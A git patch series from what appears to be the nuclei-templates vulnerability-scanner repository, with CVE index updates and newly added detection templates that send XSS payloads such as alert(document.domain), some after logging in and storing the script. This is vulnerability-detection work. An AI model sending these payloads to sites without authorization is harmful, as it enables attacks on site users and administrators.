workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 8c385f545b7be49be234bdfbc1ec031601e04d5e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 05:12:03 +0000 Subject: [PATCH 450/609] Auto Generated cves.json [Fri Jul 7 05:12:03 UTC 2023] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 259a07c22c..2e0511f93a 100644 --- a/cves.json +++ b/cves.json @@ -1783,6 +1783,7 @@ {"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"} {"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"} {"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"} +{"ID":"CVE-2023-0297","Info":{"Name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","Severity":"critical","Description":"Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0297.yaml"} {"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"} {"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"} {"ID":"CVE-2023-0562","Info":{"Name":"Bank Locker Management System v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0562.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 682df38b16..333e9dc7cc 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -b830e8b5ef413ec8d972848bd93b95d8 +533356ef27875e894f92009e6ed006e4 From a74075258511421335000dddfd158d3f0d532158 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 7 Jul 2023 14:36:51 +0530 Subject: [PATCH 451/609] Update .nuclei-ignore --- .nuclei-ignore | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 81ba0d7c4b..e12177872c 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -25,7 +25,9 @@ tags: files: - http/cves/2006/CVE-2006-1681.yaml - http/cves/2007/CVE-2007-5728.yaml + - http/cves/2011/CVE-2011-4618.yaml - http/cves/2014/CVE-2014-9608.yaml + - http/cves/2018/CVE-2018-5316.yaml - http/cves/2018/CVE-2018-5233.yaml - http/cves/2019/CVE-2019-14696.yaml - http/cves/2020/CVE-2020-11930.yaml @@ -34,4 +36,4 @@ files: - http/cves/2020/CVE-2020-28351.yaml - http/cves/2021/CVE-2021-35265.yaml - http/vulnerabilities/oracle/oracle-ebs-xss.yaml - - http/vulnerabilities/other/nginx-module-vts-xss.yaml \ No newline at end of file + - http/vulnerabilities/other/nginx-module-vts-xss.yaml From 03f90d7ef8c7a6509d82fda7c04afcd6484cc81b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 09:35:11 +0000 Subject: [PATCH 452/609] Auto Generated New Template Addition List [Fri Jul 7 09:35:11 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 20e2734534..364b378af3 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ http/cnvd/2022/CNVD-2022-86535.yaml http/cves/2018/CVE-2018-6530.yaml http/cves/2023/CVE-2023-0297.yaml http/cves/2023/CVE-2023-28121.yaml +http/cves/2023/CVE-2023-2822.yaml http/exposed-panels/arangodb-web-Interface.yaml http/exposed-panels/arcserve-panel.yaml http/exposed-panels/cloudpanel-login.yaml From 4f4c51f0b1d4612735b70334499d90f61a377902 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 09:35:16 +0000 Subject: [PATCH 453/609] Auto Generated cves.json [Fri Jul 7 09:35:16 UTC 2023] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 2e0511f93a..2423822318 100644 --- a/cves.json +++ b/cves.json @@ -1846,6 +1846,7 @@ {"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"} {"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"} {"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"} +{"ID":"CVE-2023-2822","Info":{"Name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2822.yaml"} {"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"} {"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"} {"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 333e9dc7cc..5948d863b7 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -533356ef27875e894f92009e6ed006e4 +be483aa0e41e51f1744cd9bd05cb8c4d From e7a77b177363aa7d91961d98c9ee95fadd03795f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 09:35:33 +0000 Subject: [PATCH 454/609] Auto Generated Templates Checksum [Fri Jul 7 09:35:33 UTC 2023] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c5f0e49ae4..be411765fd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:b322c9ba292e0298b561b25a8950e989c4b50787 TEMPLATES-STATS.md:a53dea26d4e3da65292a159ecd28b58abe0f6f3a TOP-10.md:f96c096252794274c196f158e78053e036412447 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:b34482e51322718857e9ee10c4c317ef24235777 -cves.json-checksum.txt:53a48e1332a61ef896c0390e55bcb6a84ab1e5cf +cves.json:fdc48e6c8c60feb9377cc704dad99e43cafcf992 +cves.json-checksum.txt:771630b0d050cef73712c3ec08e917755534c727 dns/azure-takeover-detection.yaml:90ea816357526ee7c170731114de8fc0a2357a27 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/cname-fingerprint.yaml:f7200ff1f3b3f96a7a92ddd6b49e5e5abe1d2377 @@ -2293,6 +2293,7 @@ http/cves/2023/CVE-2023-27524.yaml:5d9d1c2f754a3827697cb0bf2ef692674d04ca12 http/cves/2023/CVE-2023-27587.yaml:a0b97ad8bafd98905e0b0e87847d3403fac759a7 http/cves/2023/CVE-2023-2780.yaml:dd29bca7f9f6c5e4ecdfa4b29c86a365af626436 http/cves/2023/CVE-2023-28121.yaml:8597360791d1374d994064c71b6cfacb3e5d8ce1 +http/cves/2023/CVE-2023-2822.yaml:cf2cda4c7f854cc975f621099adc574add8dd213 http/cves/2023/CVE-2023-2825.yaml:71dcd086a266e962a2dd48ff0f1698d57a029ce7 http/cves/2023/CVE-2023-28343.yaml:4551a7c5763274fc8b10c6d805a55c695b70ab22 http/cves/2023/CVE-2023-28432.yaml:755387cfedd81b00c66955f39b60850e92203998 @@ -6521,7 +6522,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:4a6ce126b1a3cb110daaa68a4455df90e827e7be +templates-checksum.txt:45df3de79ada95328de686d6d029497a5c459871 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 332e19282ed450cc6827f71b22a4231403e415c7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 7 Jul 2023 15:08:49 +0530 Subject: [PATCH 455/609] templates added --- cves/2022/CVE-2022-4295.yaml | 34 +++++ cves/2023/CVE-2023-36346.yaml | 42 ++++++ http/cves/2019/CVE-2019-14789.yaml | 42 ++++++ http/cves/2019/CVE-2019-8390.yaml | 70 +++++++++ http/cves/2020/CVE-2020-19515.yaml | 44 ++++++ http/cves/2020/CVE-2020-35984.yaml | 60 ++++++++ http/cves/2020/CVE-2020-35985.yaml | 59 ++++++++ http/cves/2020/CVE-2020-35986.yaml | 60 ++++++++ http/cves/2020/CVE-2020-35987.yaml | 59 ++++++++ http/cves/2022/CVE-2022-43164.yaml | 61 ++++++++ http/cves/2022/CVE-2022-43165.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43166.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43167.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43169.yaml | 59 ++++++++ http/cves/2022/CVE-2022-43170.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43185.yaml | 59 ++++++++ http/cves/2022/CVE-2022-44944.yaml | 61 ++++++++ http/cves/2022/CVE-2022-44946.yaml | 61 ++++++++ http/cves/2022/CVE-2022-44947.yaml | 61 ++++++++ http/cves/2022/CVE-2022-44948.yaml | 59 ++++++++ http/cves/2022/CVE-2022-44949.yaml | 128 ++++++++++++++++ http/cves/2022/CVE-2022-44950.yaml | 128 ++++++++++++++++ http/cves/2022/CVE-2022-44951.yaml | 59 ++++++++ http/cves/2022/CVE-2022-44952.yaml | 142 ++++++++++++++++++ http/cves/2023/CVE-2023-0514.yaml | 46 ++++++ http/cves/2023/CVE-2023-1730.yaml | 36 +++++ http/cves/2023/CVE-2023-1835.yaml | 43 ++++++ http/cves/2023/CVE-2023-1890.yaml | 44 ++++++ http/cves/2023/CVE-2023-2023.yaml | 44 ++++++ http/cves/2023/CVE-2023-2252.yaml | 42 ++++++ http/cves/2023/CVE-2023-2272.yaml | 46 ++++++ http/cves/2023/CVE-2023-30256.yaml | 44 ++++++ http/cves/2023/CVE-2023-30777.yaml | 44 ++++++ http/cves/2023/CVE-2023-36287.yaml | 47 ++++++ http/cves/2023/CVE-2023-36289.yaml | 50 ++++++ http/exposed-panels/qdpm-login-panel.yaml | 35 +++++ .../wordpress/contus-video-gallery-sqli.yaml | 44 ++++++ .../leaguemanager-sql-injection.yaml | 30 ++++ .../wordpress/notificationx-sqli.yaml | 43 ++++++ .../wordpress/zero-spam-sql-injection.yaml | 32 ++++ 40 files changed, 2258 insertions(+) create mode 100644 cves/2022/CVE-2022-4295.yaml create mode 100644 cves/2023/CVE-2023-36346.yaml create mode 100644 http/cves/2019/CVE-2019-14789.yaml create mode 100644 http/cves/2019/CVE-2019-8390.yaml create mode 100644 http/cves/2020/CVE-2020-19515.yaml create mode 100644 http/cves/2020/CVE-2020-35984.yaml create mode 100644 http/cves/2020/CVE-2020-35985.yaml create mode 100644 http/cves/2020/CVE-2020-35986.yaml create mode 100644 http/cves/2020/CVE-2020-35987.yaml create mode 100644 http/cves/2022/CVE-2022-43164.yaml create mode 100644 http/cves/2022/CVE-2022-43165.yaml create mode 100644 http/cves/2022/CVE-2022-43166.yaml create mode 100644 http/cves/2022/CVE-2022-43167.yaml create mode 100644 http/cves/2022/CVE-2022-43169.yaml create mode 100644 http/cves/2022/CVE-2022-43170.yaml create mode 100644 http/cves/2022/CVE-2022-43185.yaml create mode 100644 http/cves/2022/CVE-2022-44944.yaml create mode 100644 http/cves/2022/CVE-2022-44946.yaml create mode 100644 http/cves/2022/CVE-2022-44947.yaml create mode 100644 http/cves/2022/CVE-2022-44948.yaml create mode 100644 http/cves/2022/CVE-2022-44949.yaml create mode 100644 http/cves/2022/CVE-2022-44950.yaml create mode 100644 http/cves/2022/CVE-2022-44951.yaml create mode 100644 http/cves/2022/CVE-2022-44952.yaml create mode 100644 http/cves/2023/CVE-2023-0514.yaml create mode 100644 http/cves/2023/CVE-2023-1730.yaml create mode 100644 http/cves/2023/CVE-2023-1835.yaml create mode 100644 http/cves/2023/CVE-2023-1890.yaml create mode 100644 http/cves/2023/CVE-2023-2023.yaml create mode 100644 http/cves/2023/CVE-2023-2252.yaml create mode 100644 http/cves/2023/CVE-2023-2272.yaml create mode 100644 http/cves/2023/CVE-2023-30256.yaml create mode 100644 http/cves/2023/CVE-2023-30777.yaml create mode 100644 http/cves/2023/CVE-2023-36287.yaml create mode 100644 http/cves/2023/CVE-2023-36289.yaml create mode 100644 http/exposed-panels/qdpm-login-panel.yaml create mode 100644 http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml create mode 100644 http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml create mode 100644 http/vulnerabilities/wordpress/notificationx-sqli.yaml create mode 100644 http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml diff --git a/cves/2022/CVE-2022-4295.yaml b/cves/2022/CVE-2022-4295.yaml new file mode 100644 index 0000000000..ccecc02849 --- /dev/null +++ b/cves/2022/CVE-2022-4295.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-4295 + +info: + name: Show all comments < 7.0.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. + reference: + - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56 + - https://nvd.nist.gov/vuln/detail/CVE-2022-4295 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-4295 + cwe-id: CWE-79 + metadata: + verified: true + publicwww-query: /wp-content/plugins/show-all-comments-in-one-page + tags: cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + - 'contains(body, "Select ")' + condition: and diff --git a/cves/2023/CVE-2023-36346.yaml b/cves/2023/CVE-2023-36346.yaml new file mode 100644 index 0000000000..2df196adc2 --- /dev/null +++ b/cves/2023/CVE-2023-36346.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-36346 + +info: + name: POS Codekop v2.0 - Cross-site Scripting (Reflected) + author: r3Y3r53 + severity: medium + description: | + POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php. + reference: + - https://yuyudhn.github.io/pos-codekop-vulnerability/ + - https://www.youtube.com/watch?v=bbbA-q1syrA + - https://nvd.nist.gov/vuln/detail/CVE-2023-36346 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30256 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,pos,codekop,unauthenticated + +requests: + - method: GET + path: + - "{{BaseURL}}/print.php?nm_member=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml new file mode 100644 index 0000000000..fa9427a85d --- /dev/null +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -0,0 +1,42 @@ +id: CVE-2019-14789 + +info: + name: Custom 404 Pro < 3.2.8 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/81ee1df5-12dc-49d8-8d49-ca28d6f5b7fd + - https://wordpress.org/plugins/custom-404-pro/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-14789 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-14789 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "")' + - 'contains(body_2, "Custom 404 Pro")' + condition: and diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml new file mode 100644 index 0000000000..51c9b057d1 --- /dev/null +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -0,0 +1,70 @@ +id: CVE-2019-8390 + +info: + name: qdPM 9.1 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. + reference: + - https://www.exploit-db.com/exploits/46399/ + - http://qdpm.net/download-qdpm-free-project-management + - https://nvd.nist.gov/vuln/detail/CVE-2019-8390 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-8390 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:762074255 + max-request: 3 + tags: cve,cve2019,xss,qdpm,authenticated,edb + +http: + - raw: + - | + GET /index.php/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer= + + - | + POST /index.php/users HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + search[keywords]=e">&search_by_extrafields[]=9 + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'alert alert-info alert-search-result' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'name="login\[_csrf_token\]" value="(.*?)"' + internal: true diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml new file mode 100644 index 0000000000..ad8ee4f768 --- /dev/null +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-19515 + +info: + name: qdPM 9.1 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. + reference: + - https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting + - http://qdpm.net/download-qdpm-free-project-management + - https://nvd.nist.gov/vuln/detail/CVE-2020-19515 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-19515 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:762074255 + tags: cve,cve2020,xss,qdpm,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php?step=database_config&db_error=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'qdPM' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml new file mode 100644 index 0000000000..9683b3b423 --- /dev/null +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-35984 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/4 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35984 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35984 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2020,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml new file mode 100644 index 0000000000..6422b35447 --- /dev/null +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -0,0 +1,59 @@ +id: CVE-2020-35985 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/3 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35985 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35985 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2020,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_lists/lists&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml new file mode 100644 index 0000000000..60ffd46e2a --- /dev/null +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-35986 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/2 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35986 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35986 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2020,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + 